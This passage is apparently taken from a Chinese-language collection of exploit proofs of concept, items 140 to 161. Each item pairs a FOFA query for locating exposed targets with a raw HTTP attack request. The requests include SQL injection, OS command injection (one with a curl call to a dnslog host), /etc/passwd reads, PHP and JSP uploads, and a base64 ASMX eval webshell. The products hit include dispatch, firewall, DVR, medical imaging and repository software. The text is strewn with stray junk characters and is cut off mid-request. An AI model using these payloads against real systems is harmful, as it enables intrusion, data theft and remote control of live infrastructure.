FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
/ v6 _5 D- }% I7 ~# `2 {GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
! T) @! X2 W9 @. `Host: x.x.x.x
8 f4 D, U) g9 W! {7 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0' f9 m. X$ o& \2 f0 g" l4 m% l2 h* u. D; }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ R- S9 g( h- | p! \, NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ s9 d" K* ?- b* v2 w
Accept-Encoding: gzip, deflate, br
$ X3 ?: q" K8 S. c; n( ZConnection: close7 }2 _. z4 s! n" B6 {1 b: h9 P
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
) S& p4 O) G* `. {0 u+ ?- `Upgrade-Insecure-Requests: 1
( V- c" h+ n; w9 l: h( c v7 Q9 b; R6 ~! N
6 E" R- w9 N5 O7 W* w, u140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
( r; Z: P' z% |+ `CVE-2024-2566+ Y) _9 {+ o4 h: _) _- x
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
# n$ m6 d( r* r* h/ |+ S) l- FGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
2 b: Y7 {* o# U# ]1 P, m6 b& G: EHost: x.x.x.x- {# E, D9 T7 a+ }3 `. T# v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0- o, P( s5 n- o7 O: z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 n! c3 p4 Z% b0 p' C* f- W* p: Z2 FAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( K; u9 F; W" f$ lAccept-Encoding: gzip, deflate, br
3 M+ t4 K) c: W# pConnection: close
, U4 [4 G3 U, p% _1 l/ p$ vCookie: authcode=h8g91 i( M$ @( C% q" p. X6 X
Upgrade-Insecure-Requests: 1
3 k- f9 H% e3 n1 r+ U0 k4 ?5 N0 E- k) i' U; J& O3 E3 Q4 F& d
" I, P( \; |4 h: h G
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
" D( d; i" a. Q4 n9 kFOFA:body="指挥调度管理平台"" P- w4 u7 T( _; x
POST /app/ext/ajax_users.php HTTP/1.1. ?' O4 g( ~$ G, _
Host: your-ip
' ?, \4 |( c4 S$ D( |User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info& |/ g, @) {5 G
Content-Type: application/x-www-form-urlencoded
! ]! B+ y! a. b0 N" I
3 e4 Q9 b1 p: i5 G, A9 Y5 y8 E- j& x5 q! I& S5 n
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -% Y6 E1 D) B2 V% u. ]
1 y7 _& c Z( P" |8 }; q
8 j" d' N: t% i6 G( ?( W5 b142. CMSV6车辆监控平台系统中存在弱密码
2 p2 W, N* P+ P: M* |/ ~" f( X: fCVE-2024-29666
( p; {6 {2 K& d8 W& uFOFA:body="/808gps/"2 ^. c! |% ~$ }* g: O
admin/admin
3 ~& D6 C7 u+ F) K143. Netis WF2780 v2.1.40144 远程命令执行
1 @! e" o2 c. e4 gCVE-2024-25850" n% p- Z0 n6 F/ K
FOFA:title='AP setup' && header='netis'+ y+ h8 e9 I" U. H; A
PAYLOAD! q8 W& \ N4 h0 k# e4 Z
# v- T8 Y3 {6 {144. D-Link nas_sharing.cgi 命令注入
9 B7 U6 \; ]/ P' V" Y! X& gFOFA:app="D_Link-DNS-ShareCenter"9 y: @$ K7 S3 g1 H% [7 t/ s7 i0 l% I
system参数用于传要执行的命令
/ T0 |: n/ ]& @+ S# q, ~2 Y/ ]GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.14 e! K$ ?( |* M Q
Host: x.x.x.x
( ~: N0 `* L, H3 M" SUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.06 u* T: `8 v8 T C/ x& u8 ]; q
Connection: close
# Q1 o& \. v9 C; o8 e9 [Accept: */*
7 P# u) W3 j9 g6 q3 f5 F* V9 nAccept-Language: en
9 B9 x4 w6 M) f2 s+ KAccept-Encoding: gzip) r4 U- M( w# X3 {6 V
; y' K9 J) S0 k1 i- g1 Z/ m' y0 B6 |! Y% Z. b
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入! Z5 ]+ C2 m. f! R* O7 Q
CVE-2024-3400- |: V; `; A! D; R
FOFA:icon_hash="-631559155"! v, {/ q$ b0 n9 |, d) w
GET /global-protect/login.esp HTTP/1.1
" r2 Y$ _$ S" }2 b, sHost: 192.168.30.112:1005
" R/ a$ \1 }: J2 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
' v! c" L1 P0 _* A, [, WConnection: close
& h1 C4 {. E; i1 JCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;1 g+ ~- h2 T3 F; o
Accept-Encoding: gzip. l8 L: c2 P- w
% ]7 `- t; d7 w) |1 E6 y, n
. Q- |% J% E' L8 m1 {& f146. MajorDoMo thumb.php 未授权远程代码执行+ n4 \6 X# H2 w6 B1 N" u
CNVD-2024-02175
1 m+ N. H6 z' ?" Y* _& b8 ] `" WFOFA:app="MajordomoSL"" z2 I7 G% t" [& @
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
C- j1 ]7 @! DHost: x.x.x.x' Q6 U, d& [! ]. @2 e! l$ h q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
s. R5 X" W. u* BAccept-Charset: utf-8
2 T) Y% N5 V- ]* H! }$ T6 h, q5 I6 CAccept-Encoding: gzip, deflate) d: }& z- v1 @2 b( t1 D: S' x
Connection: close% m0 V6 l; j$ t" }
X7 [; ]3 h5 |# z% d/ {2 d9 u3 U: N& R% B: E
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
6 m9 @) h4 q0 v+ x. \, R H5 ACVE-2024-32399! M' H7 S% M E& j# j# d! ~2 E
FOFA:body="RaidenMAILD"
* i9 b4 {* C% \2 \# S2 UGET /webeditor/../../../windows/win.ini HTTP/1.1
2 L8 g9 s6 \; J) i9 J1 EHost: 127.0.0.1:81- V8 `2 N/ }/ ^' s$ F
Cache-Control: max-age=0/ A/ I9 \$ v4 Q0 [* y7 n
Connection: close5 I9 X B2 ?. Y+ u1 o, Y/ a5 R
& S" z$ ^ Y; i3 u7 z
6 V/ G; Z3 K1 J' l" z
148. CrushFTP 认证绕过模板注入9 V' h! h3 A# n0 f- y+ c
CVE-2024-40401 \# d7 H0 o7 m1 L4 M V
FOFA:body="CrushFTP"
2 C% H. J* \ N; H# a! T" K! ]PAYLOAD! s' }( b- d: z3 _: b. o( F
; u7 x# K5 N* K$ s% l0 Y A149. AJ-Report开源数据大屏存在远程命令执行
' K2 P1 t! e' v$ z, t6 kFOFA:title="AJ-Report"
6 [$ N, R9 P; W0 H8 X
8 j& N3 m( O1 o" @POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
# j I- |' X: fHost: x.x.x.x
6 K* [; {1 E! `( ^8 N- M0 \) W/ IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
. q3 ]. t2 ^' p5 h, R2 CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! I& c$ ~ b6 m+ A, ?2 oAccept-Encoding: gzip, deflate, br+ e: p3 ~# C; o3 Z
Accept-Language: zh-CN,zh;q=0.9
/ k+ v, `+ N& J. L1 }) {Content-Type: application/json;charset=UTF-8" u+ S5 l- J9 W) K# ]! R y0 _" a9 i
Connection: close$ K( j: ^; y) C. y6 U; ~' C) s
1 r1 n- U" ] k# R6 f0 H{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
! @# C- r' x4 w) H8 g) R6 B
# s& R5 H+ e7 z3 A5 {150. AJ-Report 1.4.0 认证绕过与远程代码执行1 B; ^5 i6 J8 n# `+ |
FOFA:title="AJ-Report"
1 V# B' _3 f+ yPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
& [2 ]" g- [' a( A! @! iHost: x.x.x.x! w8 b1 W7 \5 \6 Y$ W9 C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36) ?) s. z: z9 o7 q# P1 \. H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% p9 P C. e: \0 Z" e( ~
Accept-Encoding: gzip, deflate, br p- a T: G- P/ i
Accept-Language: zh-CN,zh;q=0.9
8 J) p+ q3 {7 A) gContent-Type: application/json;charset=UTF-8, ~, m2 ?( ^2 I+ M3 _
Connection: close
& x+ }1 }3 W! L3 U* rContent-Length: 3394 w6 {3 T4 C, C2 Z5 ~, o0 j7 F, R
A4 ^" g8 p2 N; W{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}3 R) t4 G z( o% m
- B( p% B4 v! p; }$ |* U. H3 ?4 m! Y2 H" C# @9 B
151. AJ-Report 1.4.1 pageList sql注入+ A, J0 Z8 s! e; C, B, S4 f* T P
FOFA:title="AJ-Report"
9 L) I7 q9 `# M" A0 _ I L5 m% SGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
' g) ~/ a# a, V2 x1 k; @( JHost: x.x.x.x! d# }& n! K: j8 Y2 q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% f( v4 @' s) BConnection: close
6 \( y5 f9 {. ]; m0 LAccept-Encoding: gzip2 {( r* ~# d& Q& O9 c4 v' I
+ c5 M% c" O( J, Q" f
4 N) U( R$ B( u; V9 g7 [" P3 \
152. Progress Kemp LoadMaster 远程命令执行! c x( B, E K# b( Y( C$ M
CVE-2024-1212* \4 X$ T/ Z$ T+ D$ E+ _/ F& E
LoadMaster <= 7.2.59.2 (GA)
" h$ g. o+ |- P) _1 P& a5 `# FLoadMaster<=7.2.54.8 (LTSF)# y% I! a6 A+ p
LoadMaster <= 7.2.48.10 (LTS)
- V- U6 D) d+ A3 R- \! fFOFA:body="LoadMaster"; b, X9 m5 h; V: L' `
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码' `2 f P. m# p
GET /access/set?param=enableapi&value=1 HTTP/1.1
' a- q, W3 ` ]- m, ]Host: x.x.x.x
; T% R7 e, V% Q* ]" U! l, mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1/ v0 n; }! A) ~( `& c8 q
Connection: close
3 o; A r8 f/ ~1 R! H) V4 ?Accept: */*4 @. X" M) ^- y5 G$ M) D- V
Accept-Language: en
' \% R) k0 ]7 C+ g _0 T0 d& GAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
; `, {+ n2 Y; M! o! F6 `1 B! MAccept-Encoding: gzip
; Q p. A" J: a: u$ n( D) A9 s" E% B/ E. y7 Z7 \/ }: A" k
. z ^5 {3 f& y0 i0 U) x153. gradio任意文件读取
* {1 j1 O5 O7 iCVE-2024-1561FOFA:body="__gradio_mode__"
9 i. O* Z! y. p1 F ?第一步,请求/config文件获取componets的id( i( g! J% w/ Y
http://x.x.x.x/config
8 h: _3 X3 ~/ ^8 A9 B. Y5 j3 o- X6 j/ b5 D7 x0 E* g5 l
- t1 V8 q# Q/ P) U第二步,将/etc/passwd的内容写入到一个临时文件4 N% q5 I9 k$ ]1 n7 T3 z
POST /component_server HTTP/1.1, K# e* B Y- h! r- u
Host: x.x.x.x: u/ b V/ M, m! Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
1 `5 v+ T; V4 M5 ^Connection: close5 j* N; p! \3 c/ S0 E- l
Content-Length: 115 {% j0 w! K; f' O( {0 A2 M! g
Content-Type: application/json
0 p" C$ H3 P4 ]- t9 s6 pAccept-Encoding: gzip! U7 K, e/ F7 W$ z
8 O4 Y' m; O/ a# Y" p% y6 b& Y' I( P3 |& X
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}7 r% [, n5 k% Z( I5 x
, ]( ^% p5 Y& E' f/ ?. U; t8 S
5 X9 ]) W$ w% E4 A$ }; B第三步访问; [1 o, Q9 p3 M- V- T- z
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd3 y+ K0 W; t; `: r
' d! ]* y8 w' a8 a! C$ A7 s
# g7 f" i) P, y8 e, ~7 \2 m154. 天维尔消防救援作战调度平台 SQL注入
3 n% {# g; W/ F( s! _& `$ NCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入" I9 W- A8 W- U3 m
POST /twms-service-mfs/mfsNotice/page HTTP/1.19 Z' w6 k/ H) q9 A" `& B
Host: x.x.x.x# E& O6 _$ p5 Z. f& n- t& x
Content-Length: 106
* M( S1 V* q( s: n f% L# OCache-Control: max-age=0
- t6 [7 V& z3 U- d' zUpgrade-Insecure-Requests: 1
4 _! g. \6 o. n# Y1 X. |5 G$ |Origin: http://x.x.x.x
! i& W4 F) {$ _, T3 ^Content-Type: application/json' ^, E6 n' o3 d6 M! M3 V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
4 n; W/ j. @- B" NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 q6 I& ]$ F! j7 }
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
! @2 A6 Z$ L9 Z0 B$ L7 oAccept-Encoding: gzip, deflate; _2 Q6 D g1 p& D5 e
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7+ a+ l! C! C% X4 q1 M6 H
Connection: close
0 ^& \9 l5 u/ k; Y: L
# K5 N8 l7 c, @, f( B3 _{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}8 ?- c" I9 R. Q$ L/ g( ~: d# J. ]3 t
6 u0 f$ D- Q9 B" G* Z& s: J2 }7 B% \4 X$ }
155. 六零导航页 file.php 任意文件上传
j$ R) H7 v3 T9 B" d5 |, ACVE-2024-34982
l/ _' Q: K. t* x$ ]6 |+ fFOFA:title=="上网导航 - LyLme Spage"
6 n4 b* F: u8 r" SPOST /include/file.php HTTP/1.1
5 O5 z; v% `3 zHost: x.x.x.x, z" h, v5 `0 j* y/ N- w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
4 n$ ?& D4 s4 IConnection: close+ ]4 k( B3 c: F$ y& Y+ `( ]
Content-Length: 232
7 X: H: H( g# r: f- M/ TAccept: application/json, text/javascript, */*; q=0.01
* Y! e) e% d+ K5 X, ?4 m! D$ B- BAccept-Encoding: gzip, deflate, br
- l1 x& z9 }7 k( W# NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 t! q0 J& N; D- D
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f! L0 Q8 K5 `4 `+ Q7 e: Y% C
X-Requested-With: XMLHttpRequest3 x) y- @; I: M. [1 h1 N
! ^- c$ d$ ^0 |0 M-----------------------------qttl7vemrsold314zg0f8 D6 ^, X& [! u; E
Content-Disposition: form-data; name="file"; filename="test.php"" V) k- q: D* X8 s1 @, `/ v) P
Content-Type: image/png
) e+ b( s* p/ l
+ g( t0 F' w" q- D# W8 e0 D* N% d+ t<?php phpinfo();unlink(__FILE__);?>
. V6 D& r) \7 c6 i% w-----------------------------qttl7vemrsold314zg0f--) B8 h# _) P B" w
! r3 O. U: f& u% t+ t- {. t
& i5 ^0 T' e6 N8 H8 N4 p; c& ~访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
; z( m3 y% W' N0 q( U* T1 N: m2 c
# a, K& f9 ]8 j& u4 {& ~156. TBK DVR-4104/DVR-4216 操作系统命令注入
) U% M; \: n5 _; e, ~CVE-2024-3721! a$ i3 o8 F) Z7 M5 Q
FOFA:"Location: /login.rsp"
) @$ h9 W& _, S: \% @ ]( W·TBK DVR-4104$ c& x7 M4 P+ ^
·TBK DVR-4216; K2 {+ v$ K6 A. N
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
3 Q' F( U0 i1 N$ d: ~+ E: u$ _" R$ z" M8 C
; N" m1 w- t8 M3 u/ {# \POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
0 w; }/ R9 T5 p5 EHost: x.x.x.x
2 b: d+ s) v" o6 F6 `' B+ [6 AUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 r% s6 z' ~9 A$ E% r! a1 F# XConnection: close+ k. D' V6 X. u& B
Content-Length: 0/ }9 _- e/ g7 c3 K7 Z8 j
Cookie: uid=1
8 V; m3 q! }; o' h; SAccept-Encoding: gzip
9 ]: o" k$ A9 z) U5 Q! g" E# G
& V" h9 b6 X) B' I% v) m7 M/ R8 D3 W* ~( L- h& N/ C: [. R# q% z& a
157. 美特CRM upload.jsp 任意文件上传/ d" N3 P$ P* W- t
CNVD-2023-069710 m5 D8 j7 ~! g) `* ~7 Y; o# Z! J
FOFA:body="/common/scripts/basic.js"
+ T8 G" i2 y D( S @POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.13 t- W' Q, p7 I! E
Host: x.x.x.x
( `7 S0 S/ o/ Z. A7 r8 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36/ d- c( v' L5 L6 ~0 I& ?
Content-Length: 7092 w0 v3 s$ D$ }' x" g/ z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% r/ R3 k H* J1 x, ^: `7 V
Accept-Encoding: gzip, deflate
8 A9 j) f/ X. X5 aAccept-Language: zh-CN,zh;q=0.9
2 Q8 |5 Z/ q7 u% w3 i" XCache-Control: max-age=0
9 D4 n) u; M: e9 _ Q% R! AConnection: close5 ~8 s4 e# r1 j
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN/ ^& t$ [6 U2 f# W) V$ o5 `
Upgrade-Insecure-Requests: 1
! [8 D' J3 H4 E7 }: c U% w4 e) o+ g) ~9 B9 s, i5 f
------WebKitFormBoundary1imovELzPsfzp5dN
, N/ V! R# g$ ]4 C& |4 IContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
/ |" |1 F, g1 y1 A1 ?7 OContent-Type: application/octet-stream
9 h8 @' }; U- m& S" y! f7 o
" V0 Y. h* I' w- f* I" M6 unyhelxrutzwhrsvsrafb
8 D8 b' c/ ^3 c1 L* G------WebKitFormBoundary1imovELzPsfzp5dN
* b0 F, [2 c4 M, U& J3 eContent-Disposition: form-data; name="key"
* |" k9 V# z; n5 c$ X8 i9 \- z$ S6 r& A
null
a* _% K* B: `; w/ B9 T4 K2 m------WebKitFormBoundary1imovELzPsfzp5dN4 w/ M% }/ j1 M$ R# @' G
Content-Disposition: form-data; name="form"
6 J# e" |3 v+ X+ D- D1 L) H* E8 M, C2 _ g% |& M' B
null9 \" m3 Q% o! f' ^4 {
------WebKitFormBoundary1imovELzPsfzp5dN
2 H3 A3 }- v% ]- UContent-Disposition: form-data; name="field"! O% } j! }9 b7 F" y0 `6 q/ _
! i& O3 A) x1 b# `* Y' j4 pnull# ?9 D) g) i& v6 y$ p: v Z
------WebKitFormBoundary1imovELzPsfzp5dN
. V+ N- Y$ j4 ~) h& eContent-Disposition: form-data; name="filetitile"1 G7 S; F* e3 F/ w$ M
: E, z% _8 w$ y" N3 y# S$ B+ ]null3 t5 S9 T7 W9 j6 u# c
------WebKitFormBoundary1imovELzPsfzp5dN* w& L2 [/ a5 y: {# [6 X* \. @
Content-Disposition: form-data; name="filefolder": W) ^& B# K( Y4 ^( M$ ^
! F+ d$ b4 @6 ~( M5 u0 w
null1 f+ Z. N, h' o8 d7 K) R. R- p+ J2 M
------WebKitFormBoundary1imovELzPsfzp5dN--
3 `) y7 L( `7 L- [5 w0 g3 [% r" ]& A. n# y* D0 L5 J+ `
; \$ ?% n& t5 e# s( ~
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
2 v; v% Y# n) v; ^! Q
5 x/ O- T/ U* D& }6 w8 J158. Mura-CMS-processAsyncObject存在SQL注入, [5 G4 S" R# l% h2 ^9 N* X
CVE-2024-326407 S, W+ I$ n2 U3 w7 a, \( o' H
FOFA:"Generator: Masa CMS"
1 G _4 \, @6 [" I i. [2 f% {POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1' \ v- Y, r: t5 E4 X% M) q) Y
Host: {{Hostname}}
) i1 ?7 A+ N6 H, J; n/ L; K+ zContent-Type: application/x-www-form-urlencoded
: t7 W* A( W3 L9 k- P/ r: n$ b2 h/ b9 N8 \+ [3 e
object=displayregion&contenthistid=x\'&previewid=1/ U% z0 {3 F) u& d& k2 n0 q
' n) h. W @% D0 t, k; d h5 p
( [! b; ]- n& F3 M8 K U$ D159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传; i. M* n% [/ ]5 g& }( k$ c
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
( j8 g/ Z3 u5 O1 z) _; b/ rPOST /webservices/WebJobUpload.asmx HTTP/1.1
' o! B6 g+ W$ Q! i0 i$ c: ^Host: x.x.x.x
; o& ]1 t% r1 y; hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36& Q$ N- `% j$ S- p
Content-Length: 1080
( ]7 |% q8 j' lAccept-Encoding: gzip, deflate" V' }8 b' i9 U) B) S B2 t
Connection: close2 J+ q, i# C, F# h) e* B; U: v/ v ^
Content-Type: text/xml; charset=utf-88 J( d' r! f0 ]' @; e* B9 Y- H+ K
Soapaction: "http://rainier/jobUpload"
# }1 o6 B: U2 X2 l0 c% Q! P- W
( a. O# C! [5 h* S<?xml version="1.0" encoding="utf-8"?>1 v- }( `2 X& `) Y- _
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
1 P" V0 B, m. H. u<soap:Body>2 A! m. F1 ?4 W$ g p( R
<jobUpload xmlns="http://rainier">5 {9 p; Z8 M3 x9 X" Y( F
<vcode>1</vcode>9 B+ N; Y0 q' x; `
<subFolder></subFolder>; w( P+ }, b0 ?6 [
<fileName>abcrce.asmx</fileName>
) z4 _- Q, w1 E# G<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
. [2 m+ y( N- Q7 \</jobUpload>
; S8 X* h, {# b# G7 L' k9 i</soap:Body>" F; n# Z1 M1 V0 A* ? F3 q) Y
</soap:Envelope>
- Y! ]" [" x$ `! G) C! ?
4 V4 b, ]% z7 ~0 e2 f
$ E( [* Y+ T) z4 I+ m/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
! u* G$ V* f) O X- V e: N- c; J; u r
0 ^( M) T! d- j160. Sonatype Nexus Repository 3目录遍历与文件读取
$ g1 i/ ]; v S: uCVE-2024-4956
. y i' A0 p; s5 w9 p7 zFOFA:title="Nexus Repository Manager"
9 j* Q! C' c9 N( ?: P* bGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
+ U) Y; D! f& [5 I, }6 n. p/ v) ~Host: x.x.x.x! V! B5 T" l1 @7 ?
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
# V' ^) w! n J2 K, M# jConnection: close
8 I, X0 p2 s: T, `# c. oAccept: */*6 D! }# @/ U" q; K. R; n
Accept-Language: en
0 G9 @, c8 _5 g/ U+ h4 H% `Accept-Encoding: gzip
?6 u D7 l0 w9 e" u( c S
: ?4 |& n& T$ d( T; h) k* U; @
- p& v& P x: M+ p! {: w1 m6 [161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
0 N5 c6 y0 L; x( FFOFA:body="/KT_Css/qd_defaul.css"
; ^( z9 n6 ~/ s+ r+ `( A8 p第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
: S5 j H/ F5 w# ? Q: PPOST /Webservice.asmx HTTP/1.1
- ]5 m9 u. @$ ` ^. |Host: x.x.x.x
7 E+ H/ I! ]* j4 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36* f! E+ D" T/ V/ k* W: g
Connection: close" l/ p1 m% }) {
Content-Length: 445/ i2 l5 A7 e+ q# q$ d: E
Content-Type: text/xml1 @' X# ], N, T% }2 o5 T" q
Accept-Encoding: gzip: Z$ Q2 l9 ~% }* M
, K( N2 o6 X/ ~. s1 C<?xml version="1.0" encoding="utf-8"?>
/ H3 H% Y) Y2 O3 K' M<soap:Envelope xmlns:xsi="- t) Q( ~/ m: ~% }3 N
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
. `5 b8 p! \& i! @xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
